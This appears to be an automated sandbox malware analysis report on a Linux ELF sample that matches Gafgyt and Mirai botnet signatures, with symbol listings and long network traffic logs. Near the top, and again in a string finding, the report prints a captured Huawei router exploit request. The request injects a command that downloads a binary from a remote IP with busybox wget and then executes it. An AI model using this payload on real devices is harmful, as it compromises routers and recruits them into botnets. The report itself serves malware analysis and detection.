              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: i586.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: i586.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

              System Summary

              barindex
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
              Source: Process Memory Space: i586.elf PID: 5537, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: i586.elf PID: 5538, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: i586.elf PID: 5540, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: ELF static info symbol of initial sampleName: vseattack
              Source: i586.elfELF static info symbol of initial sample: huawei_scanner.c
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_fake_time
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_get_random_ip
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_recv_strip_null
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_rsck
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_rsck_out
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_scanner_init
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_scanner_kill
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_scanner_pid
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_scanner_rawpkt
              Source: i586.elfELF static info symbol of initial sample: huaweiscanner_setup_connection
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
              Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
              Source: 5537.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
              Source: 5538.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
              Source: 5540.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
              Source: Process Memory Space: i586.elf PID: 5537, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: i586.elf PID: 5538, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: i586.elf PID: 5540, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: classification engineClassification label: mal100.spre.troj.linELF@0/0@2/0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 39676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35226 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38996 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56444 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55684 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53474 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56612 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51938 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44200 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60300 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52174 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55670 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48870 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34522 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54734 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54602 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44058 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34040 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40620 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47784 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40264 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42580 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48344 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53772 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39744 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37696 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41152 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39814 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59058 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40528 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58928 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56994 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48932 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59520 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45528 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47878 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44590 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55808 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45216 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42474 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47336 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34986 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54386 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48634 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35904 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37550 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52306 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36094 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47366 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35364 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34798 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41222 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48226 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37528 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33344 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48238 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60576 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37576 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45614 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39344 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54194 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57746 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41214 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41864 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37688 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41142 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45694 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47610 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37618 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49658 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47840 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47370 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57560 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41548 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36186 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60954 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40242 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57160 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52926 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51710 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54988 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60456 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50398 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45050 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56822 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52136 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41756 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37254 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34834 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51916 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58340 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47220 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33304 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33100 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57626 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38582 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57382 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35484 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53510 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58452 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57022 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40834 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54338 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46652 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44244 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56246 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47806 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52406 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 37215
